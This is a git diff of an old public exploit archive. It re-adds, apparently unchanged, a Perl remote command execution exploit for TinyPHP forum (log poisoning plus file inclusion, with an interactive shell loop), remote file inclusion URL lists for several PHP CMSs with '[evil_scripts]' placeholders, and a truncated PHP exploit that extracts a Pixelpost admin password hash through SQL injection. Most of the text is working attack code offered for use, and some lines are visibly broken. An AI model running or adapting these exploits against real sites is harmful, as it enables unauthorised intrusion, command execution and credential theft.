+http://www.site.com/[metajour_path]/extension/related/related.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/search/search.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/search/search.datatype.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/shop/shop.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/sitemap/sitemap.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/sitemap/sitemap.datatype.php?GLOBALS[system_path]=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/slide/slide.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/uptodate/uptodate.class.php?system_path=[evil_scripts]
+
+#Elo ;-)
+
+# milw0rm.com [2006-05-31]
diff --git a/platforms/php/webapps/1857.pl b/platforms/php/webapps/1857.pl
index e0d9fccbf..8a40dffb9 100755
--- a/platforms/php/webapps/1857.pl
+++ b/platforms/php/webapps/1857.pl
@@ -1,108 +1,108 @@
-#!/usr/bin/perl
-# $App :
-# TinyPHP forum <= 3.6 Remote Command Execution Exploit
-# $Bug :
-# http://tiny_php/profile.php?action=view&uname=../a_file%00
-# $IHST: h4ckerz.com / hackerz.ir / aria-security.net
-#
-#### (c)oded By Hessam-x ( Hessamx -at- Hessamx.net)
-
-use IO::Socket;
-use LWP::Simple;
-
-print "-------------------------------------------\n";
-print "=            TinyPHP forum v 3.6          =\n";
-print "=       By Hessam-x  - www.hackerz.ir     =\n";
-print "-------------------------------------------\n\n";
-
-if (@ARGV < 2)
-{
-	print "[*] Usage: hxxpl.pl [host] [path]\n\n";
-	exit();
-}
-
-    $server=$ARGV[0];
-    $path=$ARGV[1];
-    print " SERVER : $server \n";
-    print " Path   : $path   \n";
-    print "-------------------------------------------\n";
-
-$pcode ="";
-$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server", PeerPort=>"http(80)") || die "[-] Cannot not connect to host !\n";
-
- print $socket "GET ".$path.$pcode." HTTP/1.1\r\n";
- print $socket "User-Agent: ".$pcode."\r\n";
- print $socket "Host: ".$server."\r\n";
- print $socket "Connection: close\r\n\r\n";
- close($socket);
-
-print "[+] PHP code injection in log file finished. \n";
-$log = "no";
-@apache=(
-  "/var/log/httpd/access_log%00","/var/log/httpd/error_log%00",
-  "/var/log/apache/error.log%00","/var/log/apache/access.log%00",  
-  "/apache/logs/error.log%00", "/apache/logs/access.log%00",
-  "/etc/httpd/logs/acces_log%00","/etc/httpd/logs/acces.log%00",
-  "/etc/httpd/logs/error_log%00","/etc/httpd/logs/error.log%00",
-  "/var/www/logs/access_log%00","/var/www/logs/access.log%00",
-  "/usr/local/apache/logs/access_log%00","/usr/local/apache/logs/access.log%00",
-  "/var/log/apache/access_log%00","/var/log/apache/access.log%00",
-  "/var/log/access_log%00","/var/www/logs/error_log%00",
-  "/www/logs/error.log%00","/usr/local/apache/logs/error_log%00",
-  "/usr/local/apache/logs/error.log%00","/var/log/apache/error_log%00",
-  "/var/log/apache/error.log%00","/var/log/access_log%00","/var/log/error_log%00",
-);
-for ($i=0; $i<=$#apache; $i++)
-  {
- 
-print "[+] Apache Path : ".$i."\n";
-
-$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$server, Timeout  => 10, PeerPort=>"http(80)") || die "[-] cannot connect to host! \n";
-
-  print $sock "GET ".$path."profile.php?action=view&&cmd=id&uname=".$path[$i]." HTTP/1.1\r\n";
-  print $sock "Host: ".$server."\r\n";
-  print $sock "Connection: close\r\n\r\n";
-
-    $out = "";
-    while ($answer = <$sock>) 
-    {
-    $out.=$answer;
-    }
-    close($sock);
-
-
-if ($out =~ m/_Hessamx_(.*?)_xHessam_/ms)
-  {
-  print "[+] Log File found ! [ $i ] \n\n";
-  $log = $i;
-  $i = $#path
-  }
-   
-  }
-if ($log eq "no") {
-    print "[-] Can not found log file ! \n";
-    print "\n[-] Exploit Failed ! ... \n";
-    exit;
-   }
-print "[Hessam-x\@ $server] \$ ";
-$cmd = ;
-
-while($cmd !~ "exit")
-{
-	$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") || die "[-] Cannot connect to host !\n";
-	
-	print $socket "GET ".$path."profile.php?cmd=".$cmd."action=view&uname=../../../../../../../../../".$path[$log]." HTTP/1.1\r\n";
-	print $socket "Host: ".$serv."\r\n";
-	print $socket "Accept: */*\r\n";
-        print $socket "Connection: close\r\n\n";	
-	
-	while ($answer = <$socket>)
-	{
-	    print $answer;
-	}
-	
-	print "[Hessam-x\@ $server ] \$ ";
-	$cmd = ;	
-}
-
-# milw0rm.com [2006-06-01]
+#!/usr/bin/perl
+# $App :
+# TinyPHP forum <= 3.6 Remote Command Execution Exploit
+# $Bug :
+# http://tiny_php/profile.php?action=view&uname=../a_file%00
+# $IHST: h4ckerz.com / hackerz.ir / aria-security.net
+#
+#### (c)oded By Hessam-x ( Hessamx -at- Hessamx.net)
+
+use IO::Socket;
+use LWP::Simple;
+
+print "-------------------------------------------\n";
+print "=            TinyPHP forum v 3.6          =\n";
+print "=       By Hessam-x  - www.hackerz.ir     =\n";
+print "-------------------------------------------\n\n";
+
+if (@ARGV < 2)
+{
+	print "[*] Usage: hxxpl.pl [host] [path]\n\n";
+	exit();
+}
+
+    $server=$ARGV[0];
+    $path=$ARGV[1];
+    print " SERVER : $server \n";
+    print " Path   : $path   \n";
+    print "-------------------------------------------\n";
+
+$pcode ="";
+$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server", PeerPort=>"http(80)") || die "[-] Cannot not connect to host !\n";
+
+ print $socket "GET ".$path.$pcode." HTTP/1.1\r\n";
+ print $socket "User-Agent: ".$pcode."\r\n";
+ print $socket "Host: ".$server."\r\n";
+ print $socket "Connection: close\r\n\r\n";
+ close($socket);
+
+print "[+] PHP code injection in log file finished. \n";
+$log = "no";
+@apache=(
+  "/var/log/httpd/access_log%00","/var/log/httpd/error_log%00",
+  "/var/log/apache/error.log%00","/var/log/apache/access.log%00",  
+  "/apache/logs/error.log%00", "/apache/logs/access.log%00",
+  "/etc/httpd/logs/acces_log%00","/etc/httpd/logs/acces.log%00",
+  "/etc/httpd/logs/error_log%00","/etc/httpd/logs/error.log%00",
+  "/var/www/logs/access_log%00","/var/www/logs/access.log%00",
+  "/usr/local/apache/logs/access_log%00","/usr/local/apache/logs/access.log%00",
+  "/var/log/apache/access_log%00","/var/log/apache/access.log%00",
+  "/var/log/access_log%00","/var/www/logs/error_log%00",
+  "/www/logs/error.log%00","/usr/local/apache/logs/error_log%00",
+  "/usr/local/apache/logs/error.log%00","/var/log/apache/error_log%00",
+  "/var/log/apache/error.log%00","/var/log/access_log%00","/var/log/error_log%00",
+);
+for ($i=0; $i<=$#apache; $i++)
+  {
+ 
+print "[+] Apache Path : ".$i."\n";
+
+$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$server, Timeout  => 10, PeerPort=>"http(80)") || die "[-] cannot connect to host! \n";
+
+  print $sock "GET ".$path."profile.php?action=view&&cmd=id&uname=".$path[$i]." HTTP/1.1\r\n";
+  print $sock "Host: ".$server."\r\n";
+  print $sock "Connection: close\r\n\r\n";
+
+    $out = "";
+    while ($answer = <$sock>) 
+    {
+    $out.=$answer;
+    }
+    close($sock);
+
+
+if ($out =~ m/_Hessamx_(.*?)_xHessam_/ms)
+  {
+  print "[+] Log File found ! [ $i ] \n\n";
+  $log = $i;
+  $i = $#path
+  }
+   
+  }
+if ($log eq "no") {
+    print "[-] Can not found log file ! \n";
+    print "\n[-] Exploit Failed ! ... \n";
+    exit;
+   }
+print "[Hessam-x\@ $server] \$ ";
+$cmd = ;
+
+while($cmd !~ "exit")
+{
+	$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") || die "[-] Cannot connect to host !\n";
+	
+	print $socket "GET ".$path."profile.php?cmd=".$cmd."action=view&uname=../../../../../../../../../".$path[$log]." HTTP/1.1\r\n";
+	print $socket "Host: ".$serv."\r\n";
+	print $socket "Accept: */*\r\n";
+        print $socket "Connection: close\r\n\n";	
+	
+	while ($answer = <$socket>)
+	{
+	    print $answer;
+	}
+	
+	print "[Hessam-x\@ $server ] \$ ";
+	$cmd = ;	
+}
+
+# milw0rm.com [2006-06-01]
diff --git a/platforms/php/webapps/1858.txt b/platforms/php/webapps/1858.txt
index be4888c57..21423812e 100755
--- a/platforms/php/webapps/1858.txt
+++ b/platforms/php/webapps/1858.txt
@@ -1,21 +1,21 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#
-# ACID v1.1.3 CMS (root_path) - Remote File Include Vulnerabilities
-# Script site: http://herve.labas.free.fr/acid/en/
-# Find by Kacper (Rahim).
-# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Special greetz DragonHeart :***
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
-#
-##################################################################
-
-
-http://www.site.com/[ACID_path]/admin/menu.php?root_path=[evil_scripts]
-http://www.site.com/[ACID_path]/admin/profile.php?root_path=[evil_scripts]
-http://www.site.com/[ACID_path]/admin/users.php?root_path=[evil_scripts]
-http://www.site.com/[ACID_path]/includes/cache_mngt.php?root_path=[evil_scripts]
-http://www.site.com/[ACID_path]/includes/gallery_functions.php?root_path=[evil_scripts]
-
-# milw0rm.com [2006-06-01]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#
+# ACID v1.1.3 CMS (root_path) - Remote File Include Vulnerabilities
+# Script site: http://herve.labas.free.fr/acid/en/
+# Find by Kacper (Rahim).
+# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Special greetz DragonHeart :***
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
+#
+##################################################################
+
+
+http://www.site.com/[ACID_path]/admin/menu.php?root_path=[evil_scripts]
+http://www.site.com/[ACID_path]/admin/profile.php?root_path=[evil_scripts]
+http://www.site.com/[ACID_path]/admin/users.php?root_path=[evil_scripts]
+http://www.site.com/[ACID_path]/includes/cache_mngt.php?root_path=[evil_scripts]
+http://www.site.com/[ACID_path]/includes/gallery_functions.php?root_path=[evil_scripts]
+
+# milw0rm.com [2006-06-01]
diff --git a/platforms/php/webapps/1860.txt b/platforms/php/webapps/1860.txt
index 4b90a0aa6..871739d23 100755
--- a/platforms/php/webapps/1860.txt
+++ b/platforms/php/webapps/1860.txt
@@ -1,13 +1,13 @@
-Script: Bytehoard 2.1 Epsilon/Delta  www.bytehoard.org
-Discovered: beford 
-File: ./bytehoard/includes/webdav/server.php
-Vuln: Remote File Include
-
-[code]
-require_once $bhconfig['bhfilepath']."/includes/webdav/_parse_propfind.php";
-[/code]
-
-
-http://url.com/bytehoard/includes/webdav/server.php?bhconfig[bhfilepath]=attacker
-
-# milw0rm.com [2006-06-01]
+Script: Bytehoard 2.1 Epsilon/Delta  www.bytehoard.org
+Discovered: beford 
+File: ./bytehoard/includes/webdav/server.php
+Vuln: Remote File Include
+
+[code]
+require_once $bhconfig['bhfilepath']."/includes/webdav/_parse_propfind.php";
+[/code]
+
+
+http://url.com/bytehoard/includes/webdav/server.php?bhconfig[bhfilepath]=attacker
+
+# milw0rm.com [2006-06-01]
diff --git a/platforms/php/webapps/1861.txt b/platforms/php/webapps/1861.txt
index 2ddd77591..794c74158 100755
--- a/platforms/php/webapps/1861.txt
+++ b/platforms/php/webapps/1861.txt
@@ -1,20 +1,20 @@
-Script: Redaxo CMS
-Vendor: http://www.redaxo.de
-Discovered: beford 
-
-Redaxo 3.2 - 3.1 - 3.0
-
-./redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
-
-Redaxo 3.0
-
-./redaxo3_0_demos_patched/redaxo/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=attacker
-./redaxo3_0_demos_patched/redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
-./redaxo3_0_demos_patched/redaxo/include/addons/stats/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
-
-Redaxo 2.7.4
-
-./redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
-./redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=attacker
-
-# milw0rm.com [2006-06-02]
+Script: Redaxo CMS
+Vendor: http://www.redaxo.de
+Discovered: beford 
+
+Redaxo 3.2 - 3.1 - 3.0
+
+./redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
+
+Redaxo 3.0
+
+./redaxo3_0_demos_patched/redaxo/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=attacker
+./redaxo3_0_demos_patched/redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
+./redaxo3_0_demos_patched/redaxo/include/addons/stats/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
+
+Redaxo 2.7.4
+
+./redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=attacker
+./redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=attacker
+
+# milw0rm.com [2006-06-02]
diff --git a/platforms/php/webapps/1863.txt b/platforms/php/webapps/1863.txt
index 5f1afbb39..25317c151 100755
--- a/platforms/php/webapps/1863.txt
+++ b/platforms/php/webapps/1863.txt
@@ -1,22 +1,22 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#
-# Igloo 0.1.9 and prior [(text_wiki mod)] - Remote File Include Vulnerabilities
-# Script site: http://download.savannah.nongnu.org/releases/igloo/
-# dork: Igloo (interest group glue)
-# Find by Kacper (Rahim).
-# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Special greetz DragonHeart :***
-# and greetz str0ke  :-)
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
-#
-##################################################################
-Expl:
-
-http://www.site.com/[Igloo_path]/class/Wiki/Wiki.php?c_node[class_path]=[evil_scripts]
-
-
-#Elo ;-)
-
-# milw0rm.com [2006-06-02]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#
+# Igloo 0.1.9 and prior [(text_wiki mod)] - Remote File Include Vulnerabilities
+# Script site: http://download.savannah.nongnu.org/releases/igloo/
+# dork: Igloo (interest group glue)
+# Find by Kacper (Rahim).
+# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Special greetz DragonHeart :***
+# and greetz str0ke  :-)
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
+#
+##################################################################
+Expl:
+
+http://www.site.com/[Igloo_path]/class/Wiki/Wiki.php?c_node[class_path]=[evil_scripts]
+
+
+#Elo ;-)
+
+# milw0rm.com [2006-06-02]
diff --git a/platforms/php/webapps/1864.txt b/platforms/php/webapps/1864.txt
index eccd6cc26..d88f70b2e 100755
--- a/platforms/php/webapps/1864.txt
+++ b/platforms/php/webapps/1864.txt
@@ -1,23 +1,23 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#
-# ashnews v0.83(pathtoashnews) - Remote File Include Vulnerabilities
-# Script site: http://dev.ashwebstudio.com/
-# dork: News powered by ashnews
-# Find by Kacper (Rahim).
-# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Special greetz DragonHeart :***
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
-#
-##################################################################
-Expl:
-
-http://www.site.com/[ashnews_path]/ashheadlines.php?pathtoashnews=[evil_scripts]
-
-http://www.site.com/[ashnews_path]/ashnews.php?pathtoashnews=[evil_scripts]
-
-
-#Elo ;-)
-
-# milw0rm.com [2006-06-02]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#
+# ashnews v0.83(pathtoashnews) - Remote File Include Vulnerabilities
+# Script site: http://dev.ashwebstudio.com/
+# dork: News powered by ashnews
+# Find by Kacper (Rahim).
+# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Special greetz DragonHeart :***
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
+#
+##################################################################
+Expl:
+
+http://www.site.com/[ashnews_path]/ashheadlines.php?pathtoashnews=[evil_scripts]
+
+http://www.site.com/[ashnews_path]/ashnews.php?pathtoashnews=[evil_scripts]
+
+
+#Elo ;-)
+
+# milw0rm.com [2006-06-02]
diff --git a/platforms/php/webapps/1865.txt b/platforms/php/webapps/1865.txt
index 2ccea77e7..0b599e52e 100755
--- a/platforms/php/webapps/1865.txt
+++ b/platforms/php/webapps/1865.txt
@@ -1,17 +1,17 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#
-# Informium 0.12.0 - Remote File Include Vulnerabilities
-# Script site: http://prdownloads.sourceforge.net/informium/
-# Find by Kacper (Rahim).
-# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Special greetz DragonHeart :***
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
-#
-##################################################################
-Expl:
-
-http://www.site.com/[Informium_path]/admin/common-menu.php?CONF[local_path]=[evil_scripts]
-
-# milw0rm.com [2006-06-02]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#
+# Informium 0.12.0 - Remote File Include Vulnerabilities
+# Script site: http://prdownloads.sourceforge.net/informium/
+# Find by Kacper (Rahim).
+# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Special greetz DragonHeart :***
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
+#
+##################################################################
+Expl:
+
+http://www.site.com/[Informium_path]/admin/common-menu.php?CONF[local_path]=[evil_scripts]
+
+# milw0rm.com [2006-06-02]
diff --git a/platforms/php/webapps/1866.txt b/platforms/php/webapps/1866.txt
index 1a2041511..2d1ec7f3c 100755
--- a/platforms/php/webapps/1866.txt
+++ b/platforms/php/webapps/1866.txt
@@ -1,29 +1,29 @@
-# Milli-Harekat Advisory ( www.milli-harekat.org )
-# PHP-Nuke <= All version - Remote File Include Vulnerabilities
-# Risk : High
-# Class: Remote
-# Script : PHP NUKE ALL VERSION
-# Credits : ERNE
-# Thanks : Dj_ReMix,Eskobar,TR_IP,ßy KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS
-# Vulnerable :
-
-http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
-http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts]
-
-# milw0rm.com [2006-06-02]
+# Milli-Harekat Advisory ( www.milli-harekat.org )
+# PHP-Nuke <= All version - Remote File Include Vulnerabilities
+# Risk : High
+# Class: Remote
+# Script : PHP NUKE ALL VERSION
+# Credits : ERNE
+# Thanks : Dj_ReMix,Eskobar,TR_IP,ßy KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS
+# Vulnerable :
+
+http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
+http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts]
+
+# milw0rm.com [2006-06-02]
diff --git a/platforms/php/webapps/1868.php b/platforms/php/webapps/1868.php
index 674c3905d..d174bdc02 100755
--- a/platforms/php/webapps/1868.php
+++ b/platforms/php/webapps/1868.php
@@ -1,384 +1,384 @@
-#!/usr/bin/php -q -d short_open_tag=on
-alert(document.cookie)
-   http://[target]/[path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info&admin_lang_pp_exif2=
-   http://[target]/[path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info&admin_lang_pp_path=
-
-   iv) another xss, without to be logged in:
-   http://[target]/[path]/admin/index.php?loginmessage=">
-
-   									      */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-
-}
-
-function is_hash($hash)
-{
- if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
- else {return false;}
-}
-
-function make_seed()
-{
-   list($usec, $sec) = explode(' ', microtime());
-   return (float) $sec + ((float) $usec * 100000);
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$your_ip=$argv[3];
-$cmd="";$port=80;$proxy="";$table_prefix="pixelpost_";
-
-for ($i=4; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P") and ($temp<>"-T"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-if ($temp=="-T")
-{
-  $table_prefix=str_replace("-T","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else
-{
-$p='http://'.$host.':'.$port.$path;
-$temp=explode(":",$proxy);
-$your_ip=$temp[0];
-}
-
-echo "Trying sql injection in 'category' argument...\r\n";
-$sql="'/**/UNION SELECT/**/'1','2',password,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
-$sql=urlencode($sql);
-$packet="GET ".$p."?x=browse&category=".$sql." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-$temp=explode("alt=\"",$html);
-$temp2=explode("\"",$temp[1]);
-$hash=trim($temp2[0]);
-if (is_hash($hash)){
-echo "admin md5 password hash -> ".$hash."\r\n";
-$sql="'/**/UNION/**/SELECT/**/'1','2',admin,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
-$sql=urlencode($sql);
-$packet="GET ".$p."?x=browse&category=".$sql." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-$temp=explode("alt=\"",$html);
-$temp2=explode("\"",$temp[1]);
-$admin=trim($temp2[0]);
-echo "  \"   username          -> ".$admin."\r\n";
-}
-else { echo "Trying with 'archivedate' argument...\r\n";
-$sql="')/**/UNION SELECT/**/'1','2',password,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
-$sql=urlencode($sql);
-$packet="GET ".$p."?x=browse&archivedate=".$sql." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-$temp=explode("alt=\"",$html);
-$temp2=explode("\"",$temp[1]);
-$hash=trim($temp2[0]);
-if (is_hash($hash)){
-         echo "admin md5 password hash -> ".$hash."\r\n";
-         }
